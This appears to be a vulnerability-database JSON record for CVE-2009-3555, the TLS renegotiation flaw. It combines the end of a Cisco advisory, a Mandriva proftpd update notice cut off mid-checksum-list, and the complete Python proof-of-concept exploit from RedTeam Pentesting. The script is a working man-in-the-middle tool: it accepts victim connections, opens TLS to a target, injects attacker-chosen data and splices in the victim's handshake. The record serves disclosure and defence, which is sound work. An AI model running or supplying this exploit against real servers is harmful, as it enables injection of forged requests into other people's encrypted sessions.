as product mix, network topology, traffic\r\nbehavior, and organizational mission. Due to the variety of affected\r\nproducts and releases, customers should consult with their service\r\nprovider or support organization to ensure any applied workaround or fix\r\nis the most appropriate for use in the intended network before it is\r\ndeployed.\r\n\r\nCustomers without Service Contracts\r\n- -----------------------------------\r\n\r\nCustomers who purchase direct from Cisco but do not hold a Cisco service\r\ncontract, and customers who purchase through third-party vendors but are\r\nunsuccessful in obtaining fixed software through their point of sale\r\nshould acquire upgrades by contacting the Cisco Technical Assistance\r\nCenter (TAC). TAC contacts are as follows.\r\n\r\n * +1 800 553 2447 (toll free from within North America)\r\n * +1 408 526 7209 (toll call from anywhere in the world)\r\n * e-mail: tac@cisco.com\r\n\r\nCustomers should have their product serial number available and be\r\nprepared to give the URL of this notice as evidence of entitlement to a\r\nfree upgrade. Free upgrades for non-contract customers must be requested\r\nthrough the TAC.\r\n\r\nRefer to\r\nhttp://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html\r\nfor additional TAC contact information, including localized telephone\r\nnumbers, and instructions and e-mail addresses for use in various\r\nlanguages.\r\n\r\nExploitation and Public Announcements\r\n=====================================\r\n\r\nThis vulnerability was initially discovered by Marsh Ray and Steve\r\nDispensa from PhoneFactor, Inc.\r\n\r\nCisco is not aware of any malicious exploitation of this vulnerability.\r\n\r\nProof-of-concept exploit code has been published for this vulnerability.\r\n\r\nStatus of this Notice: INTERIM\r\n==============================\r\n\r\nTHIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY\r\nANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF\r\nMERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE\r\nINFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS\r\nAT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS\r\nDOCUMENT AT ANY TIME.\r\n\r\nA stand-alone copy or Paraphrase of the text of this document that omits\r\nthe distribution URL in the following section is an uncontrolled copy,\r\nand may lack important information or contain factual errors.\r\n\r\nDistribution\r\n============\r\n\r\nThis advisory is posted on Cisco's worldwide website at:\r\n\r\nhttp://www.cisco.com/warp/public/707/cisco-sa-20091109-tls.shtml\r\n\r\nIn addition to worldwide web posting, a text version of this notice is\r\nclear-signed with the Cisco PSIRT PGP key and is posted to the following\r\ne-mail and Usenet news recipients.\r\n\r\n * cust-security-announce@cisco.com\r\n * first-bulletins@lists.first.org\r\n * bugtraq@securityfocus.com\r\n * vulnwatch@vulnwatch.org\r\n * cisco@spot.colorado.edu\r\n * cisco-nsp@puck.nether.net\r\n * full-disclosure@lists.grok.org.uk\r\n * comp.dcom.sys.cisco@newsgate.cisco.com\r\n\r\nFuture updates of this advisory, if any, will be placed on Cisco's\r\nworldwide website, but may or may not be actively announced on mailing\r\nlists or newsgroups. Users concerned about this problem are encouraged\r\nto check the above URL for any updates.\r\n\r\nRevision History\r\n================\r\n\r\n+------------------------------------------------------------+\r\n| Revision 1.0 | 2009-November-9 | Initial public release |\r\n+------------------------------------------------------------+\r\n\r\nCisco Security Procedures\r\n=========================\r\n\r\nComplete information on reporting security vulnerabilities\r\nin Cisco products, obtaining assistance with security\r\nincidents, and registering to receive security information\r\nfrom Cisco, is available on Cisco's worldwide website at\r\nhttp://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.\r\nThis includes instructions for press inquiries regarding\r\nCisco security notices. All Cisco security advisories are available at\r\nhttp://www.cisco.com/go/psirt.\r\n\r\n+--------------------------------------------------------------------\r\nCopyright 2008-2009 Cisco Systems, Inc. All rights reserved.\r\n+--------------------------------------------------------------------\r\n\r\nUpdated: Nov 09, 2009 Document ID: 111046\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (GNU/Linux)\r\n\r\niEYEARECAAYFAkr4TCsACgkQ86n/Gc8U/uDNWgCfYptXVZhz0qn2DvRh2zUtZ5EF\r\nOS4AoJediPm3/t9XqYIdrjR5PNP25iY/\r\n=SkAu\r\n-----END PGP SIGNATURE-----\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-12600", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:34", "description": "", "published": "2009-12-21T00:00:00", "type": "packetstorm", "title": "TLS Renegotiation Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3555"], "modified": "2009-12-21T00:00:00", "id": "PACKETSTORM:84112", "href": "https://packetstormsecurity.com/files/84112/TLS-Renegotiation-Exploit.html", "sourceData": "`#!/usr/bin/env python \n \n###################################### \n# # \n# RedTeam Pentesting GmbH # \n# kontakt@redteam-pentesting.de # \n# http://www.redteam-pentesting.de # \n# # \n###################################### \n \n# PoC exploit for the TLS renegotiation vulnerability (CVE-2009-3555) \n \n# License \n# ------- \n# CC-BY-SA http://creativecommons.org/licenses/by-sa/3.0/ \n \n# Timeline \n# -------- \n# 2009-12-21 initial public release \n \n# Known Issues \n# ------------ \n# Firefox: if it fails connecting to a TLS site too often, falls back to \n# issuing SSLv2 ClientHello only until browser is restarted \n# \n# wget: attempts SSLv2 ClientHello by default \n \n# References \n# ---------- \n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555 \n# http://www.phonefactor.com/sslgap \n# http://www.extendedsubset.com/ \n# http://www.g-sec.lu/practicaltls.pdf \n# http://tools.ietf.org/html/draft-ietf-tls-renegotiation-01 \n \nimport tlslite \nimport tlslite.api \nimport tlslite.messages \nimport tlslite.constants \nimport struct \nimport socket \nimport threading \nimport array \nimport sys \nimport optparse \n \n \nif not hasattr(threading.Thread, 'name'): \n# emulate python 2.6 threading module for earlier versions \nthreading.current_thread = threading.currentThread \nsetattr(threading.Thread, 'name', \nproperty(threading.Thread.getName, threading.Thread.setName)) \n \ndef forward(sock1, sock2): \nsock1.settimeout(1.0) \nwhile True: \ntry: \ndata = sock1.recv(4096) \nif not data: \nreturn \nsock2.send(data) \nexcept socket.error, ex_error: \nif ex_error[0] == 104: # Connection reset by peer \nreturn \nexcept socket.timeout, ex_timeout: \npass \n \n \nclass MessageWrapper(object): \ndef __init__(self, version = (3, 1), ssl2 = False): \nself.contentType = tlslite.messages.ContentType.handshake \nself.ssl2 = ssl2 \nself.client_version = version \n \ndef setType(self, type): \nself.contentType = type \n \ndef addBytes(self, bytes): \nself.bytes = bytes \n \ndef write(self, trial=False): \nif trial: \nraise Exception('Unsupported') \nreturn array.array('B', self.bytes) \n \ndef send_record(sock, msg_type, version_major, version_minor, record): \nmsg = struct.pack('!BBBH', msg_type, version_major, version_minor, len(record)) \nif type(record) != str: \nmsg += record.tostring() \nelse: \nmsg += record \nsock.send(msg) \n \ndef send_encapsulated(sslsock, type, messagebytes, version = (3, 1)): \nmsg = MessageWrapper(version) \nmsg.addBytes(struct.unpack('B'*len(messagebytes), messagebytes)) \nmsg.setType(type) \nfor dummy in sslsock._sendMsg(msg, True): \npass \n \ndef decrypt_record(sslsock, type, recordbytes): \nfor result in sslsock._decryptRecord(type, array.array('B', recordbytes)): \npass \nreturn result \n \ndef recv_record(sock): \ntry: \nheader = sock.recv(5) \nif not header: \nreturn None, None, None, None \nmsg_type, msg_version_major, msg_version_minor, msg_length = struct.unpack('!BBBH', header) \nrecord = '' \nwhile len(record) != msg_length: \nrecord += sock.recv(msg_length - len(record)) \nreturn msg_type, msg_version_major, msg_version_minor, record \nexcept socket.error, ex: \nif ex[0] == 104: # Connection reset by peer \nreturn \n \ndef recv_clienthello(sock): \nheader_bytes = [] \nheader_bytes.append(sock.recv(1)) \nheader_bytes[0] = struct.unpack('!B', header_bytes[0])[0] \nif header_bytes[0] & 0x80: \n# Version 2.0 Client \"Record Layer\" \nheader_bytes.append(sock.recv(1)) \nheader_bytes[1] = struct.unpack('!B', header_bytes[1])[0] \nmsg_length = (header_bytes[0] & 0x7f) << 8 | header_bytes[1] \nmsg_version_major = 2 \nmsg_version_minor = 0 \nmsg_type = tlslite.constants.ContentType.handshake \nrecord = sock.recv(msg_length) \nelse: \nheader = sock.recv(4) \nmsg_type = header_bytes[0] \nmsg_version_major, msg_version_minor, msg_length = struct.unpack('!BBH', header) \nrecord = sock.recv(msg_length) \n \nreturn msg_type, msg_version_major, msg_version_minor, record \n \ndef send_hello_request(sock): \nsock.send(\"\\x16\" # Record Layer: Handshake Message \n+\"\\x03\\x01\" # Record Layer Version: TLS 1.0 \n+\"\\x00\\x04\" # Record Layer Length: 4 \n+\"\\x00\" # Handshake Message Type: Hello Request \n+\"\\x00\\x00\\x00\") # Handshake Message Length: 0 \n \ndef send_protocol_version_alert(sock): \nsock.send(\"\\x15\" # Record Layer: Alert\" \n+\"\\x03\\x01\" # Record Layer Version: TLS 1.0 \n+\"\\x00\\x02\" # Record Layer Length: 2 \n+\"\\x00\" # Alert Message: fatal \n+\"\\x46\") # Alert Message: protocol version \n \n \ndef handle_victim(victim, options, mitmcount): \n \nif options.one_shot and mitmcount != 0: \nprint threading.current_thread().name, '--one-shot specified and initial connection already handled, forwarding only' \nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ntry: \nsock.connect(options.target) \nprint threading.current_thread().name, 'Connected to target %s:%u' % options.target \nexcept socket.error, ex: \nprint threading.current_thread().name, 'Couldn\\'t connect to target %s:%u' % options.target \nprint threading.current_thread().name, 'Error code %u, \\'%s\\'' % (ex[0], ex[1]) \nsys.exit(1) \n \nt1 = threading.Thread(target=forward, args=(sock, victim)) \nt1.start() \n \nt2 = threading.Thread(target=forward, args=(victim, sock)) \nt2.start() \n \nt1.join() \nsock.close() \n \nt2.join() \nvictim.close() \nreturn \n \n# obtain initial \"client hello\" message \nmsg_type, msg_version_major, msg_version_minor, hello_msg = recv_clienthello(victim) \nif msg_version_major == 2: \nprint threading.current_thread().name, \"client sent SSLv2 client hello message, exiting thread\" \nreturn \n \ntls_version = (msg_version_major, msg_version_minor) \ntype, length, version_major, version_minor, random, session_id_length = struct.unpack('!B3sBB32sB', hello_msg[:39]) \nresume_session = (session_id_length != 0) \nif resume_session: \nprint threading.current_thread().name, \"client attempting to resume session\" \n \nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ntry: \nsock.connect(options.target) \nprint threading.current_thread().name, 'Connected to target %s:%u' % options.target \nexcept socket.error, ex: \nprint threading.current_thread().name, 'Couldn\\'t connect to target %s:%u' % options.target \nprint threading.current_thread().name, 'Error code %u, \\'%s\\'' % (ex[0], ex[1]) \nsys.exit(1) \n \n \nsslsock = tlslite.api.TLSConnection(sock) \nhandshake_settings = tlslite.HandshakeSettings.HandshakeSettings() \nhandshake_settings.minVersion = tls_version \nhandshake_settings.maxVersion = tls_version \nsslsock.handshakeClientCert(settings = handshake_settings) \n \n# inject prefix \nsslsock.write(options.inject) \nprint threading.current_thread().name, 'Injected %s' % repr(options.inject) \n \n# send original \"client hello\" message over the encrypted channel \nsend_encapsulated(sslsock, 22, hello_msg, tls_version) \n \n# now receive serveral TLS messages from the server, decrypt them, and forward \n# them to the client, until the server sends \"server hello done\" \n# these messages include \"server hello\", \"certificate\", \"server key exchange\", \n# unless the client is trying to resume a previous session \nprint threading.current_thread().name, \"about to receive server handshake messages\" \nserver_handshake_done = False \nwhile not server_handshake_done: \nmsg_type, msg_version_major, msg_version_minor, result = recv_record(sslsock.sock) \nif result: \nresult = decrypt_record(sslsock, msg_type, result) \nsend_record(victim, msg_type, msg_version_major, msg_version_minor, result) \nif result[0] == 0x0e: # server hello done - should terminate handshake \nserver_handshake_done = True \nelif resume_session and msg_type == 0x14: # change cipher spec - probably irrelevant \nserver_handshake_done = True \nelse: \nprint threading.current_thread().name, 'receive from server failed, exiting thread' \nreturn \nprint threading.current_thread().name, \"server handshake done\" \n \n \n# now its the the client's turn to send some messages, e.g. \n# \"client key exchange\" and \"change cipher spec\" \nprint threading.current_thread().name, \"about to receive client handshake messages\" \nhandshake_finished = False \nwhile not handshake_finished: \nmsg_type, msg_version_major, msg_version_minor, record = recv_record(victim) \nprint threading.current_thread().name, msg_type \nsend_encapsulated(sslsock, msg_type, record, tls_version) \nif msg_type == 0x14: # change cipher spec \nhandshake_finished = True \n \nprint threading.current_thread().name, \"client handshake done\" \n \n# message after \"change cipher spec\" must be sent in the \"clear\" \nmsg_type, msg_version_major, msg_version_minor, record = recv_record(victim) \nsend_record(sslsock.sock, msg_type, msg_version_major, msg_version_minor, record) \n \n# server should now send \"change cipher spec\" message, we decrypt and send that to the victim \nmsg_type, msg_version_major, msg_version_minor, record = recv_record(sslsock.sock) \nresult = decrypt_record(sslsock, msg_type, record) \nsend_record(victim, msg_type, msg_version_major, msg_version_minor, result) \n \n# finalize handshake \nmsg_type, msg_version_major, msg_version_minor, record = recv_record(sslsock.sock) \nif record: \nsend_record(victim, msg_type, msg_version_major, msg_version_minor, record) \nelse: \nsslsock.sock.close() \nvictim.close() \ndel sslsock \nreturn \n \n \n \n# the rest is just forwarding TLS records between both parties, \n# which we cannot interfere with anymore, apart from dropping server \n# responses \nif options.drop: \nsslsock.sock.close() \ndel sslsock \nelse: \nt1 = threading.Thread(target=forward, args=(sslsock.sock, victim)) \nt1.start() \n \nt2 = threading.Thread(target=forward, args=(victim, sslsock.sock)) \nt2.start() \n \nif not options.drop: \nt1.join() \nsslsock.sock.close() \n \nt2.join() \nvictim.close() \n \n \n \nif __name__ == \"__main__\": \nparser = optparse.OptionParser() \nparser.add_option('-l', '--listen', dest='listen_port', help='port to listen on', metavar='PORT', type='int', default=8443) \nparser.add_option('-b', '--bind', dest='bind_address', help='address to bind to', metavar='ADDRESS', default='0.0.0.0') \nparser.add_option('-t', '--target', dest='target', help='host and port to connect to', metavar='HOST:PORT' ) \nparser.add_option('-i', '--inject', dest='inject', help='string to inject', metavar='DATA') \nparser.add_option('', '--inject-file', dest='inject_file', help='inject data from a file', metavar='FILE') \nparser.add_option('', '--inject-base64', dest='inject_base64', help='string to inject, base64-encoded', metavar='DATA') \nparser.add_option('-o', '--one-shot', dest='one_shot', action='store_true', help='only mitm the first connection attempt, forward all other connections') \nparser.add_option('-d', '--drop-responses', dest='drop', action=\"store_true\", default=False, help='drop server responses after renegotiating') \n \n(options, args) = parser.parse_args() \n \nif len([i for i in (options.inject, options.inject_file, options.inject_base64) if i]) != 1: \nprint 'Exactly one injection option must be specified' \nsys.exit(1) \n \nif options.inject_file: \ntry: \noptions.inject = open(options.inject_file, 'r').read() \nexcept IOError, ex: \nprint ex \nsys.exit(1) \n \nif options.inject_base64: \nimport base64 \ntry: \noptions.inject = base64.decodestring(options.inject_base64) \nexcept base64.binascii.Error, ex: \nprint 'Error decoding base64 data: %s' % ex \nsys.exit(1) \n \n \nif not options.listen_port or \\ \nnot options.bind_address or \\ \nnot options.target or \\ \nnot options.inject: \nparser.print_help() \nsys.exit(1) \n \ntarget = options.target.split(':') \nif len(target)==2: \ntry: \ntarget[1] = int(target[1]) \nexcept ValueError: \ntarget[1] = None \nif len(target)!=2 or not target[0] or not target[1]: \nprint 'Target \\'%s\\' not in format HOST:PORT' % options.target \nsys.exit(1) \n \noptions.target = tuple(target) \n \ntry: \nlistensocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nlistensocket.bind((options.bind_address, options.listen_port)) \nprint 'Listening on %s:%u' % (options.bind_address, options.listen_port) \nexcept socket.error, ex: \nprint 'Couldn\\'t listen on %s:%u' % (options.bind_address, options.listen_port) \nprint 'Error code %u, \\'%s\\'' % (ex[0], ex[1]) \nsys.exit(1) \n \nlistensocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) \nlistensocket.listen(5) \n \nmitmcount = 0 \n \nwhile True: \ntry: \nvictim, victimaddr = listensocket.accept() \nprint 'New connection from %s:%u' % victimaddr \n \nthreading.Thread(target=handle_victim, args=(victim, options, mitmcount)).start() \nmitmcount += 1 \n \nexcept KeyboardInterrupt, ex: \nprint '\\nAborted by user, exiting...' \nlistensocket.close() \nsys.exit(1) \n \n \n`\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/84112/tls-reneg.py.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:32", "bulletinFamily": "software", "cvelist": ["CVE-2009-3555"], "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2009:337\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n\r\n Package : proftpd\r\n Date : December 22, 2009\r\n Affected: 2008.0, 2009.0, 2009.1, 2010.0, Corporate 4.0,\r\n Enterprise Server 5.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n A vulnerability has been identified and corrected in proftpd:\r\n \r\n The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as\r\n used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl\r\n in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l,\r\n GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS)\r\n 3.12.4 and earlier, and other products, does not properly associate\r\n renegotiation handshakes with an existing connection, which allows\r\n man-in-the-middle attackers to insert data into HTTPS sessions,\r\n and possibly other types of sessions protected by TLS or SSL, by\r\n sending an unauthenticated request that is processed retroactively\r\n by a server in a post-renegotiation context, related to a plaintext\r\n injection attack, aka the Project Mogul issue (CVE-2009-3555).\r\n \r\n Packages for 2008.0 are provided for Corporate Desktop 2008.0\r\n customers.\r\n \r\n This update fixes this vulnerability.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555\r\n http://bugs.proftpd.org/show_bug.cgi?id=3324\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Linux 2008.0:\r\n b9b190ac1eb5d3729025435fe27d2410 2008.0/i586/proftpd-1.3.2-0.3mdv2008.0.i586.rpm\r\n 352ed8620a05f7d9a3f9852bc726775c 2008.0/i586/proftpd-devel-1.3.2-0.3mdv2008.0.i586.rpm\r\n 3c4accef7143329906820bcce43e810b \r\n2008.0/i586/proftpd-mod_autohost-1.3.2-0.3mdv2008.0.i586.rpm\r\n 57b921e47c6820412923161d751cc741 2008.0/i586/proftpd-mod_ban-1.3.2-0.3mdv2008.0.i586.rpm\r\n 08df98fb4b0d4170586384e439020ac9 2008.0/i586/proftpd-mod_case-1.3.2-0.3mdv2008.0.i586.rpm\r\n de51d0e68218af3f126d7d055850745c \r\n2008.0/i586/proftpd-mod_ctrls_admin-1.3.2-0.3mdv2008.0.i586.rpm\r\n ee8343e5f45fb2a23f4f5663cad92910 2008.0/i586/proftpd-mod_gss-1.3.2-0.3mdv2008.0.i586.rpm\r\n 4174e8c0359e5e73d74468f59c2a2a8f \r\n2008.0/i586/proftpd-mod_ifsession-1.3.2-0.3mdv2008.0.i586.rpm\r\n 8700c37c4ccb147146018adb54b868dc 2008.0/i586/proftpd-mod_ldap-1.3.2-0.3mdv2008.0.i586.rpm\r\n a8d526ad49bd15d3daa4deb0f7a4daa4 2008.0/i586/proftpd-mod_load-1.3.2-0.3mdv2008.0.i586.rpm\r\n 3e469f53af8eb3124a26ed1624020683 \r\n2008.0/i586/proftpd-mod_quotatab-1.3.2-0.3mdv2008.0.i586.rpm\r\n 0e86455066c3b477f141ede0910fc955 \r\n2008.0/i586/proftpd-mod_quotatab_file-1.3.2-0.3mdv2008.0.i586.rpm\r\n 56a7876b1176fb921f617ef266eb65f8 \r\n2008.0/i586/proftpd-mod_quotatab_ldap-1.3.2-0.3mdv2008.0.i586.rpm\r\n 41603859dbd0665a55d608fcff538b88 \r\n2008.0/i586/proftpd-mod_quotatab_radius-1.3.2-0.3mdv2008.0.i586.rpm\r\n fe63333e393a45732ccaedb635a16d41 \r\n2008.0/i586/proftpd-mod_quotatab_sql-1.3.2-0.3mdv2008.0.i586.rpm\r\n 26e9ad76b1c22212e260ccf336246b21 2008.0/i586/proftpd-mod_radius-1.3.2-0.3mdv2008.0.i586.rpm\r\n bc3f19ec11fd18073c246c0bfeb4bbd9 2008.0/i586/proftpd-mod_ratio-1.3.2-0.3mdv2008.0.i586.rpm\r\n 66c70743a6030991c75875c42fd9b245 \r\n2008.0/i586/proftpd-mod_rewrite-1.3.2-0.3mdv2008.0.i586.rpm\r\n 14a6cfaafd1a81719681ae5fd549226c 2008.0/i586/proftpd-mod_shaper-1.3.2-0.3mdv2008.0.i586.rpm\r\n 29ad593a905c1d4087f63bd98f755b75 \r\n2008.0/i586/proftpd-mod_site_misc-1.3.2-0.3mdv2008.0.i586.rpm\r\n b576a439128814e65018d37307ef89f2 2008.0/i586/proftpd-mod_sql-1.3.2-0.3mdv2008.0.i586.rpm\r\n 071b2bf259a4e6dae750e3d90231f3cc \r\n2008.0/i586/proftpd-mod_sql_mysql-1.3.2-0.3mdv2008.0.i586.rpm\r\n 716e28933156a0b68f9e6562e34286d8 \r\n2008.0/i586/proftpd-mod_sql_postgres-1.3.2-0.3mdv2008.0.i586.rpm\r\n b49c1e1395dea07f57501bb08d918c78 2008.0/i586/proftpd-mod_time-1.3.2-0.3mdv2008.0.i586.rpm\r\n 2fb275d3838849f732956a83c60551db 2008.0/i586/proftpd-mod_tls-1.3.2-0.3mdv2008.0.i586.rpm\r\n 870b85dc26c78344681b862421148bac 2008.0/i586/proftpd-mod_wrap-1.3.2-0.3mdv2008.0.i586.rpm\r\n 107bd74f488b08b637a7626bc5176f0d \r\n2008.0/i586/proftpd-mod_wrap_file-1.3.2-0.3mdv2008.0.i586.rpm\r\n 52536c6f73adfe3ff7a454491da5a403 \r\n2008.0/i586/proftpd-mod_wrap_sql-1.3.2-0.3mdv2008.0.i586.rpm \r\n deb5bda5904c3327f58415a0b558b2e8 2008.0/SRPMS/proftpd-1.3.2-0.3mdv2008.0.src.rpm\r\n\r\n Mandriva Linux 2008.0/X86_64:\r\n 039d35ee6d603e50c414e2bf06c6d043 2008.0/x86_64/proftpd-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n 2a47940a552d57d042943ebe4ab5d85c 2008.0/x86_64/proftpd-devel-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n cb2696e6ef979113fde7a7e85efcb21d \r\n2008.0/x86_64/proftpd-mod_autohost-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n f4d9804686013d384ac0e48b386bfc94 \r\n2008.0/x86_64/proftpd-mod_ban-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n 3d33970457a83ef89314b49d643de4ff \r\n2008.0/x86_64/proftpd-mod_case-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n 70c3fed5e0a9b511b9f17482ccaef698 \r\n2008.0/x86_64/proftpd-mod_ctrls_admin-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n 135b4a1342ee812e97cdf4c0bbc0a118 \r\n2008.0/x86_64/proftpd-mod_gss-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n 4ba3ec21951d95441e18fc9e01129f49 \r\n2008.0/x86_64/proftpd-mod_ifsession-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n 26c48c47f334a8c52a571a53cd8d7fea \r\n2008.0/x86_64/proftpd-mod_ldap-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n b731b39eb4bfc5b96dd6e12a3c467538 \r\n2008.0/x86_64/proftpd-mod_load-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n ad8fe669dd5523e17b37767d3825c3be \r\n2008.0/x86_64/proftpd-mod_quotatab-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n c98d4366009169721957330419d025a0 \r\n2008.0/x86_64/proftpd-mod_quotatab_file-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n 4f0c56c9fed804da72ee8fe018be572c \r\n2008.0/x86_64/proftpd-mod_quotatab_ldap-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n 073c3f255943d70abba3b27f8a9f75a8 \r\n2008.0/x86_64/proftpd-mod_quotatab_radius-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n a9b1db55bd35e56346c6f304c05af434 \r\n2008.0/x86_64/proftpd-mod_quotatab_sql-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n 03bc39eaeeffdb0ba04cfbc029436b29 \r\n2008.0/x86_64/proftpd-mod_radius-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n c907cecfb4869f999ee907935d0c407d \r\n2008.0/x86_64/proftpd-mod_ratio-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n dcb80800ca5dc45b4ebd1115e066e013 \r\n2008.0/x86_64/proftpd-mod_rewrite-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n f5f8c1acd6f816e4819c9a3b42ff5f02 \r\n2008.0/x86_64/proftpd-mod_shaper-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n d440490fcb18fb896fa413a5f636f18f \r\n2008.0/x86_64/proftpd-mod_site_misc-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n 374c1399914e5603a2063d14041ddedd \r\n2008.0/x86_64/proftpd-mod_sql-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n ca3590fbd8cf2bb0664a2d9b0bd562e2 \r\n2008.0/x86_64/proftpd-mod_sql_mysql-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n 074923354e42ee9d283e0c9a5e176454 \r\n2008.0/x86_64/proftpd-mod_sql_postgres-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n e4e79a6a2d36c074a779939fd3fb83f3 \r\n2008.0/x86_64/proftpd-mod_time-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n 3cbcceedb040f65faeda847cd213d195 \r\n2008.0/x86_64/proftpd-mod_tls-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n f8caf4531b109e46c31fce0796186666 \r\n2008.0/x86_64/proftpd-mod_wrap-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n c607bac7c7a2b9ad6b45330c508f5856 \r\n2008.0/x86_64/proftpd-mod_wrap_file-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n 4108dbac0af91704eceaa8e761341c0c \r\n2008.0/x86_64/proftpd-mod_wrap_sql-1.3.2-0.3mdv2008.0.x86_64.rpm \r\n deb5bda5904c3327f58415a0b558b2e8 2008.0/SRPMS/proftpd-1.3.2-0.3mdv2008.0.src.rpm\r\n\r\n Mandriva Linux 2009.0:\r\n c4aac925334b9878eee72407eb1610f1 2009.0/i586/proftpd-1.3.2-0.4mdv2009.0.i586.rpm\r\n a3cc261ee3e0901e05f0af9dfb783d55 2009.0/i586/proftpd-devel-1.3.2-0.4mdv2009.0.i586.rpm\r\n 74947602df92c342947f2fcac9a6a7fe \r\n2009.0/i586/proftpd-mod_autohost-1.3.2-0.4mdv2009.0.i586.rpm\r\n 3f3ae650cfd8b71ae81d8581fedb8e20 2009.0/i586/proftpd-mod_ban-1.3.2-0.4mdv2009.0.i586.rpm\r\n f5e081ecb50f488bee860b412da94c0c 2009.0/i586/proftpd-mod_case-1.3.2-0.4mdv2009.0.i586.rpm\r\n 8a2680e4f72a03822c0281b6210cbef2 \r\n2009.0/i586/proftpd-mod_ctrls_admin-1.3.2-0.4mdv2009.0.i586.rpm\r\n 823e6910a8cf0665d9b980d25b5f751f 2009.0/i586/proftpd-mod_gss-1.3.2-0.4mdv2009.0.i586.rpm\r\n 0d671b7756282ee7d9f903a49b636a20 \r\n2009.0/i586/proftpd-mod_ifsession-1.3.2-0.4mdv2009.0.i586.rpm\r\n ead6fa38c3303893513ce800f32b0c39 2009.0/i586/proftpd-mod_ldap-1.3.2-0.4mdv2009.0.i586.rpm\r\n 912aa200d61549daaa207f3b671c7773 2009.0/i586/proftpd-mod_load-1.3.2-0.4mdv2009.0.i586.rpm\r\n 3c027a9b592e825283c2cd4d6d3e6b73 \r\n2009.0/i586/proftpd-mod_quotatab-1.3.2-0.4mdv2009.0.i586.rpm\r\n 768572c3b38f4e2835e682d2ba4e3aea \r\n2009.0/i586/proftpd-mod_quotatab_file-1.3.2-0.4mdv2009.0.i586.rpm\r\n e5e9aa5d3fc64a7b733635e226217e88 \r\n2009.0/i586/proftpd-mod_quotatab_ldap-1.3.2-0.4mdv2009.0.i586.rpm\r\n d661c9bf296bf4c1ddaf7bd2a1241b3b \r\n2009.0/i586/proftpd-mod_quotatab_radius-1.3.2-0.4mdv2009.0.i586.rpm\r\n 7ee532156a9252e2a220836b0c3310b7 \r\n2009.0/i586/proftpd-mod_quotatab_sql-1.3.2-0.4mdv2009.0.i586.rpm\r\n 52d487b8988ed2fb0e1e1b8ac89ab95b 2009.0/i586/proftpd-mod_radius-1.3.2-0.4mdv2009.0.i586.rpm\r\n f9ed07158e135f00f4e6f5d188d5e5be 2009.0/i586/proftpd-mod_ratio-1.3.2-0.4mdv2009.0.i586.rpm\r\n 4a74cfccca104759f6803314d0637ff6 \r\n2009.0/i586/proftpd-mod_rewrite-1.3.2-0.4mdv2009.0.i586.rpm\r\n 54a1784bff0d683f2580e7d8efa2d364 2009.0/i586/proftpd-mod_shaper-1.3.2-0.4mdv2009.0.i586.rpm\r\n cc3487f5a092bdbd4c9017c154173442 \r\n2009.0/i586/proftpd-mod_site_misc-1.3.2-0.4mdv2009.0.i586.rpm\r\n 2ec9fd660ac78f978ec50338bd456318 2009.0/i586/proftpd-mod_sql-1.3.2-0.4mdv2009.0.i586.rpm\r\n 85718af247aec353b6df2b9bbfbeb26e 